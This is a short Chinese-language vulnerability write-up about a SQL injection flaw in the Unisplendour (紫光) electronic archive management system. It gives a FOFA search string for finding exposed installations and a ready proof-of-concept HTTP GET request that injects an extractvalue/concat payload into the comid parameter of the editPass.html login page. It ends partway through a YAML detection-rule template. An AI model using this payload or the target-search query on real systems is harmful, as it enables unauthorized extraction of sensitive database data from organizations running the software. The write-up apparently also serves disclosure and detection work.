产品简介
紫光软件系统有限公司(以下简称“紫光软件”)是中国领先的行业解决方案和IT服务提供商。
漏洞描述
紫光电子档案管理系统存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。
fofa
app=”紫光档案管理系统”
漏洞复现
GET /login/Login/editPass.html?comid=extractvalue(1,concat(char(126),md5(1))) HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
检测poc规则编写
params: []
name: 紫光档案管理系统/login/Login/editPass.html存在SQL注入漏洞
set: {}
rules:
- method: